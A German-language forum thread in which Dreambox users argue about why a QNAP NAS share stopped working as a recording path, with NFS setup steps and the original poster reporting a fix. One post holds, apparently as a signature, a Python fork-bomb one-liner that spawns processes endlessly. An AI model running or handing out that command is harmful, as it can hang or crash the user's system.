NAS mounten???

• Kann es sein, das dir nicht klar ist worum es geht!
      All das ist doch nicht gefragt und außerdem klar. Außerdem hab ich glaub ich Samba laufen und es wird trotzdem nichts gefunden, aber das müsste ich erst noch mal checken!
      Wie auch immer, kann ich ja auf das NAS zugreifen und auch die Dateien von dort abspielen, nur das mit dem Aufnehmen klappt nicht mehr!
    • Original von kati910
      P.S erzähle mir mal wie automount etwas mounten will was nicht richtig bzw garnicht konfiguriert iss??

...wer hat von falscher oder gar keiner Konfiguration gesprochen? Hast Du überhaupt gelesen um was es geht?
      Ihr solltet euch nicht von jedem kleinen Hinweis gleich auf die Palme bringen lassen. Die Meinung des Teams (das Du hier ja repräsentierst) ist doch hinreichend bekannt. Warum tut der nun wirklich kleine und ironische Nadelstich so weh? Un foit qui mal y pense...

Deine Verallgemeinerungen "das ihr euere freigabe auf dem NAS nicht im griff habt aber immer schön rumposaunen.." sind wenig zielführend und Dein Hinweis auf den Netzwerkbrowser zum jetzigen Zeitpunkt völlig daneben.
    • Ja dann erklärt mal was net geht es wird doch immer behauptet das es am netzwerkbrowser liegt siehe ->mit automount geht das!!
      Ihr könnt nicht drauf aufnehmen? könnte daran liegen das euere konfiguration auf dem qnap net passt.Und zu den Nadelstichen weisst du wieviel fragen es wegen dem netzwerkbrowser schon gab
      und andeutungen das er nicht geht und zu 99% war es immer die konfiguration des servers irgendwann sollte man sich die mühe machen und mal ins handbuch schauen wie man es mit dem jeweiligen gerät konfiguriert.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • 1.) Netzwerkdienst - NFS Dienst freigeben
      2.) Ordner wo Filme liegen für NFS freigeben (in meinem Fall Ordner Film)
      3.) Dreambox NFS Freigabefür Ordner Film einrichten

haben dann noch einen Ordner fur Bilder und Musik auf dem NAS
      Punkt 2. und 3. für diese Ordner auch noch durchführen
      dann hat mein 3 mounts im der Dreambox mit lokalen Freigabenamen z.B. NASfilm, NASbilder, NASmusik

so hab ich es gemacht beim QNAP-210 läuft ohne Probleme
      Bilder
      • nfsdienst.png

50,77 kB, 1.277×344, 1.812 mal angesehen
      • NFSZugangsteuerung.png

44,59 kB, 603×387, 1.789 mal angesehen
      • nfsfreigabe.jpg

29,67 kB, 720×405, 1.827 mal angesehen
      "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
      (Marie von Ebner-Eschenbach)
    • Es geht wieder!!! Aber fragt nicht warum!?!?!?
      Ich hab ein bisschen hier am NAS und da an den Dream Freigaben geschaut was es sein könnte, hab aber eigentlich nicht bewußt was gefunden, aber ich hab den Namen für´s Apple-Netzwerk neu vergeben, hab einen Benutzer gelöscht, den ich mal angelegt, aber nicht benutzt hab und das war´s eigentlich.
      Dann hab ich den Netzwerkbrowser der Dream noch mal gestartet und siehe da, plötzlich waren alle Freigaben da und auch der alte Aufnahmepfad lies sich wieder auswählen und eine kurze Testaufnahme hat geklappt!
      Hoffe das bleibt so... ;)

Danke für die "Hilfe", manchmal reicht es das Gefühl zu haben nicht alleine da zu stehen! :]

Und Kati, das war schon etwas übertrieben wie du reagiert hast und NASeweiss hatte mir auch früher hier schon geholfen, hat mir aber auch im anderen Forum gesagt, das er hier wohl nicht mehr verwilen wird.
      So was ist sehr schade...
    • Das ist er aber selber schuld! Soll er sich seine "Spitzfindigkeiten", "Sticheleien" und "Anfeindungen" verkneifen dann rasselt er auch nicht mit allen moeglichen Leuten aneinander. NAS Spezialist hin oder her! Wenn er meint, soll er halt besser weg bleiben ...

Im Endeffekt hat Dir keiner von Beiden geholfen!
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)